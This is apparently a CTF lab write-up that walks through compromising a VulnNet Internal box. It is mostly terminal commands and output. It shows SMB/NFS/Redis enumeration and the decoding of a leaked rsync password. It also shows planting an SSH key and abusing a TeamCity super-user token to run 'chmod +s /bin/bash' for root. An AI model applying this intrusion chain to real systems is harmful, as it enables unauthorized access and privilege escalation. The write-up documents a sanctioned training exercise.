## Fucking draggy, read some walkthrough

## redis enum
```
┌──(kali㉿kali)-[~/thm/internal]
└─$ redis-cli -h internal.thm
internal.thm:6379> INFO
NOAUTH Authentication required.
internal.thm:6379> 
```


## enum smb share
```
┌──(kali㉿kali)-[~/thm/internal]
└─$ smbclient -L //internal.thm -U guest                       
Password for [WORKGROUP\guest]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        shares          Disk      VulnNet Business Shares
        IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP   
```


## able to mount shares directory
```
┌──(kali㉿kali)-[~/thm/internal]
└─$ smbclient //internal.thm/shares -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Feb  2 17:20:09 2021
  ..                                  D        0  Tue Feb  2 17:28:11 2021
  temp                                D        0  Sat Feb  6 19:45:10 2021
  data                                D        0  Tue Feb  2 17:27:33 2021

                11309648 blocks of size 1024. 3275388 blocks available
smb: \> 
```


## Download smb data
```
┌──(kali㉿kali)-[~/thm/internal]
└─$ smbclient //internal.thm/shares -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Feb  2 17:20:09 2021
  ..                                  D        0  Tue Feb  2 17:28:11 2021
  temp                                D        0  Sat Feb  6 19:45:10 2021
  data                                D        0  Tue Feb  2 17:27:33 2021

                11309648 blocks of size 1024. 3275388 blocks available
smb: \> cd data
smb: \data\> ls
  .                                   D        0  Tue Feb  2 17:27:33 2021
  ..                                  D        0  Tue Feb  2 17:20:09 2021
  data.txt                            N       48  Tue Feb  2 17:21:18 2021
  business-req.txt                    N      190  Tue Feb  2 17:27:33 2021

                11309648 blocks of size 1024. 3275388 blocks available
smb: \data\> prompt
smb: \data\> mget *
getting file \data\data.txt of size 48 as data.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \data\business-req.txt of size 190 as business-req.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \data\> cd ..\temp
smb: \temp\> ls
  .                                   D        0  Sat Feb  6 19:45:10 2021
  ..                                  D        0  Tue Feb  2 17:20:09 2021
  services.txt                        N       38  Sat Feb  6 19:45:09 2021

                11309648 blocks of size 1024. 3275388 blocks available
smb: \temp\> mget *
getting file \temp\services.txt of size 38 as services.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \temp\> 
```


## files 
```
┌──(kali㉿kali)-[~/thm/internal]
└─$ cat data.txt                                   
Purge regularly data that is not needed anymore
                                                                                                                              
┌──(kali㉿kali)-[~/thm/internal]
└─$ cat business-req.txt 
We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
If you have any questions, please text or phone us.
                                                                                                                              
┌──(kali㉿kali)-[~/thm/internal]
└─$ cat services.txt    
..snipped..
```


## rpc
```
┌──(kali㉿kali)-[~/thm/internal]
└─$ rpcinfo -p internal.thm
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100005    1   udp  44768  mountd
    100005    1   tcp  39641  mountd
    100005    2   udp  52169  mountd
    100005    2   tcp  47571  mountd
    100005    3   udp  41337  mountd
    100005    3   tcp  41011  mountd
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    3   tcp   2049  nfs_acl
    100003    3   udp   2049  nfs
    100227    3   udp   2049  nfs_acl
    100021    1   udp  32966  nlockmgr
    100021    3   udp  32966  nlockmgr
    100021    4   udp  32966  nlockmgr
    100021    1   tcp  36749  nlockmgr
    100021    3   tcp  36749  nlockmgr
    100021    4   tcp  36749  nlockmgr
```


## config file exported
```
┌──(kali㉿kali)-[~/thm/internal]
└─$ showmount -e internal.thm
Export list for internal.thm:
/opt/conf *
```


## mount successful
```
┌──(kali㉿kali)-[~/thm/internal/tmp]
└─$ df -hT                                         
Filesystem             Type      Size  Used Avail Use% Mounted on
..snipped..
internal.thm:/opt/conf nfs4       11G  7.1G  3.2G  70% /tmp/nfs
```


## enum mounted dir
```
┌──(kali㉿kali)-[~/thm/internal/tmp/nfs]
└─$ tree
.
├── hp
│   └── hplip.conf
├── init
│   ├── anacron.conf
│   ├── lightdm.conf
│   └── whoopsie.conf
├── opt
├── profile.d
│   ├── bash_completion.sh
│   ├── cedilla-portuguese.sh
│   ├── input-method-config.sh
│   └── vte-2.91.sh
├── redis
│   └── redis.conf
├── vim
│   ├── vimrc
│   └── vimrc.tiny
└── wildmidi
    └── wildmidi.cfg

8 directories, 12 files
```


## redis.conf
```
..snipped..
requirepass "B65Hx562F@ggAZ@F"
..snipped..
```


## redis enum 
```
internal.thm:6379> info
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-135-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:526
run_id:3872c067dfb96baf1d03628ad15296e15e70ab1f
tcp_port:6379
uptime_in_seconds:1806
uptime_in_days:0
hz:10
lru_clock:805363
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

..snipped..
# Keyspace
db0:keys=5,expires=0,avg_ttl=0

internal.thm:6379> keys *
1) "marketlist"
2) "int"
3) "internal flag"
4) "authlist"
5) "tmp"

internal.thm:6379> get 'internal flag'
"THM{ff8e518addbbddb74531a724236a8221}

internal.thm:6379> LRANGE authlist 0 -1
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
4) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
```

## retrieved rsync passwd
```
┌──(kali㉿kali)-[~/thm/internal]
└─$ echo QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==|base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
```


## rsync enum
```
┌──(kali㉿kali)-[~/thm/internal]
└─$ rsync rsync://rsync-connect@internal.thm
files           Necessary home interaction

┌──(kali㉿kali)-[~/thm/internal]
└─$ rsync --list-only rsync://rsync-connect@internal.thm/files
Password: 
drwxr-xr-x          4,096 2021/02/01 20:51:14 .
drwxr-xr-x          4,096 2021/02/06 20:49:29 sys-internal

┌──(kali㉿kali)-[~/thm/internal]
└─$ rsync --list-only rsync://rsync-connect@internal.thm/files/sys-internal/
Password: 
drwxr-xr-x          4,096 2021/02/06 20:49:29 .
-rw-------             61 2021/02/06 20:49:28 .Xauthority
lrwxrwxrwx              9 2021/02/01 21:33:19 .bash_history
-rw-r--r--            220 2021/02/01 20:51:14 .bash_logout
-rw-r--r--          3,771 2021/02/01 20:51:14 .bashrc
-rw-r--r--             26 2021/02/01 20:53:18 .dmrc
-rw-r--r--            807 2021/02/01 20:51:14 .profile
lrwxrwxrwx              9 2021/02/02 22:12:29 .rediscli_history
-rw-r--r--              0 2021/02/01 20:54:03 .sudo_as_admin_successful
-rw-r--r--             14 2018/02/13 03:09:01 .xscreensaver
-rw-------          2,546 2021/02/06 20:49:35 .xsession-errors
-rw-------          2,546 2021/02/06 19:40:13 .xsession-errors.old
-rw-------             38 2021/02/06 19:54:25 user.txt
drwxrwxr-x          4,096 2021/02/02 17:23:00 .cache
drwxrwxr-x          4,096 2021/02/01 20:53:57 .config
drwx------          4,096 2021/02/01 20:53:19 .dbus
drwx------          4,096 2021/02/01 20:53:18 .gnupg
drwxrwxr-x          4,096 2021/02/01 20:53:22 .local
drwx------          4,096 2021/02/01 21:37:15 .mozilla
drwxrwxr-x          4,096 2021/02/06 19:43:14 .ssh
drwx------          4,096 2021/02/02 19:16:16 .thumbnails
drwx------          4,096 2021/02/01 20:53:21 Desktop
drwxr-xr-x          4,096 2021/02/01 20:53:22 Documents
drwxr-xr-x          4,096 2021/02/01 21:46:46 Downloads
drwxr-xr-x          4,096 2021/02/01 20:53:22 Music
drwxr-xr-x          4,096 2021/02/01 20:53:22 Pictures
drwxr-xr-x          4,096 2021/02/01 20:53:22 Public
drwxr-xr-x          4,096 2021/02/01 20:53:22 Templates
drwxr-xr-x          4,096 2021/02/01 20:53:22 Videos

┌──(kali㉿kali)-[~/thm/internal]
└─$ cat user.txt                                   
..snipped..

┌──(kali㉿kali)-[~/thm/internal]
└─$ rsync --password-file=pw.txt -av rsync://rsync-connect@internal.thm/files rsyncout 
..snipped..

┌──(kali㉿kali)-[~/thm/internal]
└─$ rsync --password-file=pw.txt -av ./id_rsa.pub  rsync://rsync-connect@internal.thm/files/sys-internal/.ssh/authorized_keys
sending incremental file list
id_rsa.pub

sent 671 bytes  received 35 bytes  282.40 bytes/sec
total size is 563  speedup is 0.80

┌──(kali㉿kali)-[~/thm/internal/rsyncout]
└─$ lsf
total 12K
drwxr-xr-x  3 kali kali 4.0K Feb  1  2021 ./
drwxrwxr-x  3 kali kali 4.0K Apr 26 11:22 ../
drwxr-xr-x 18 kali kali 4.0K Feb  6  2021 sys-internal/

┌──(kali㉿kali)-[~/thm/internal/rsyncout]
└─$ cat sys-internal/.ssh/authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0AdZ5+e9Z0lSluuncXuludKGelTJpwA4mdLNXRUhmlNOXUoB4v4LV8j3gdQFhqQdl4tskO5Ec8knmWQVvzpx7bMSUPCmmhGeG61TDCboEnMHo1mJqjn3paMe2eWh1E5DYpeegKfdoB0wzk5ld+CQaFUhHjFxlxo9/5G1Ukdj2hxV6Z7RIwTj85q4GqLmNZIYZrL1svH81694bRSzjpK65qdKcofHN87rxOdlFPwP9dpOyDrYEmIrVC5KXM5aRYdrTGKVTPemJUN1d/l3UmT/GI3jLw2Q+yjDl72BNTkGXTqcA6WfdLY4E9HO/3YFndd5IfRO/azWfLe2HDMWKR+iNC8W6wIs3eY3Z/KvUM0PIuBp4nbSRpbt2iue+9TnF/pvIFJcRUAzB8lXbW4Bibpe7rYDdNsbM/gLicS1BmDmGC/XJipP5I8sBwdDdFFBXba9mcbGLdoXJ/HGUq3LFpBS9qvNnOzA07u5RABg13+wE2Xt9niBAany2zYzQ419c/Bk= kali@kali
```


## ssh as sys-inernal 
```
┌──(kali㉿kali)-[~/thm/internal]
└─$ ssh -i id_rsa sys-internal@internal.thm
The authenticity of host 'internal.thm (10.10.101.228)' can't be established.
ED25519 key fingerprint is SHA256:Hft/gU7OujMpBswfda4Gl0bN4EdP78+T0Iszs/Eq52c.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'internal.thm' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

sys-internal@vulnnet-internal:~$ id
uid=1000(sys-internal) gid=1000(sys-internal) groups=1000(sys-internal),24(cdrom)
sys-internal@vulnnet-internal:~$ sudo -l
Password: 
sudo: a password is required
sys-internal@vulnnet-internal:~$
```


## Create LPF 
```
┌──(kali㉿kali)-[~/thm/internal]
└─$ ssh -i id_rsa sys-internal@internal.thm -L 127.0.0.1:8111:127.0.0.1:8111 
                                                                                                                              
sys-internal@vulnnet-internal:/TeamCity/logs$ cat * | grep -i "auth"
cat: catalina.2021-02-06.log: Permission denied
cat: catalina.2021-02-07.log: Permission denied
cat: catalina.2025-04-26.log: Permission denied
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
        at jetbrains.buildServer.serverSide.impl.auth.SecurityContextImpl.runAs(SecurityContextImpl.java:89)
        at jetbrains.buildServer.serverSide.impl.auth.SecurityContextImpl.runAsUnchecked(SecurityContextImpl.java:56)
        at jetbrains.buildServer.serverSide.impl.auth.SecurityContextImpl.runAsSystemUnchecked(SecurityContextImpl.java:59)
        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:544)
        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:544)
"TC: 13:48:05 Pre-compiling JSP 'http://localhost:8111/oauth/tfs/repositories.jsp?jsp_precompile=true' (348/477); 13:34:17 Task: 'jetbrains.buildServer.web.jsp.JspPrecompilerFilter$1$1@699a6f2c'; JSP pre-compilation thread 1" #70 daemon prio=5 os_prio=0 cpu=348.68ms elapsed=833.22s tid=0x000055ef74467000 nid=0x1c8f runnable  [0x00007fe6287c2000]
cat: [TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 6829243709803227481 (use empty username with the token as the password to access the server)
..snipped..
```


## Create project and then create build 
```
sys-internal@vulnnet-internal:/TeamCity/logs$ ps auxf|grep -i team
root       569  0.0  0.0   4628   664 ?        S    04:20   0:00 sh teamcity-server.sh _start_internal
root       576  0.0  0.0   4752  1752 ?        S    04:20   0:00  \_ sh /TeamCity/bin/teamcity-server-restarter.sh run
root      1027  8.4 43.7 3479896 892236 ?      Sl   04:20   6:52      \_ /usr/lib/jvm/default-java/bin/java -Djava.util.logging.config.file=/TeamCity/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -server -Xmx1024m -Dteamcity.configuration.path=../conf/teamcity-startup.properties -Dlog4j.configuration=file:/TeamCity/bin/../conf/teamcity-server-log4j.xml -Dteamcity_logs=/TeamCity/bin/../logs -Djava.awt.headless=true -Dignore.endorsed.dirs= -classpath /TeamCity/bin/bootstrap.jar:/TeamCity/bin/tomcat-juli.jar -Dcatalina.base=/TeamCity -Dcatalina.home=/TeamCity -Djava.io.tmpdir=/TeamCity/temp org.apache.catalina.startup.Bootstrap start
..snipped..

-- Login and create project --
http://localhost:8111/admin/editRunType.html?id=buildType:Testproject_Testbuild&runnerId=__NEW_RUNNER__&cameFromUrl=%2Fadmin%2FeditBuildRunners.html%3Fid%3DbuildType%253ATestproject_Testbuild%26init%3D1&cameFromTitle=

Runner type: command line

Custom script : chmod +s /bin/bash

-- Then, run the script --

Result:	 Success	Agent:	Default Agent
Time:	26 Apr 25 05:42:34 - 05:42:39 (5s)	Triggered by:	you on 26 Apr 25 05:42
```


## Escalate privs 
```
sys-internal@vulnnet-internal:/TeamCity/logs$ ls -lah /bin/bash
-rwsr-sr-x 1 root root 1.1M Apr  4  2018 /bin/bash
sys-internal@vulnnet-internal:/TeamCity/logs$ /bin/bash -p
bash-4.4# id
uid=1000(sys-internal) gid=1000(sys-internal) euid=0(root) egid=0(root) groups=0(root),24(cdrom),1000(sys-internal)
bash-4.4# 

sys-internal@vulnnet-internal:/TeamCity/logs$ /bin/bash -p
bash-4.4# id
uid=1000(sys-internal) gid=1000(sys-internal) euid=0(root) egid=0(root) groups=0(root),24(cdrom),1000(sys-internal)
bash-4.4# cd /root
bash-4.4# ls -lah
total 44K
drwx------  8 root root 4.0K Feb  6  2021 .
drwxr-xr-x 24 root root 4.0K Feb  6  2021 ..
lrwxrwxrwx  1 root root    9 Feb  1  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwxr-x---  6 root root 4.0K Apr 26 04:22 .BuildServer
drwx------  2 root root 4.0K Feb  6  2021 .cache
drwx------  4 root root 4.0K Feb  6  2021 .config
drwx------  3 root root 4.0K Feb  6  2021 .dbus
drwxr-xr-x  3 root root 4.0K Feb  2  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
lrwxrwxrwx  1 root root    9 Feb  2  2021 .rediscli_history -> /dev/null
-rw-------  1 root root   38 Feb  6  2021 root.txt
drwx------  4 root root 4.0K Feb  6  2021 .thumbnails
bash-4.4# cat root.txt
..snipped..
bash-4.4# 
```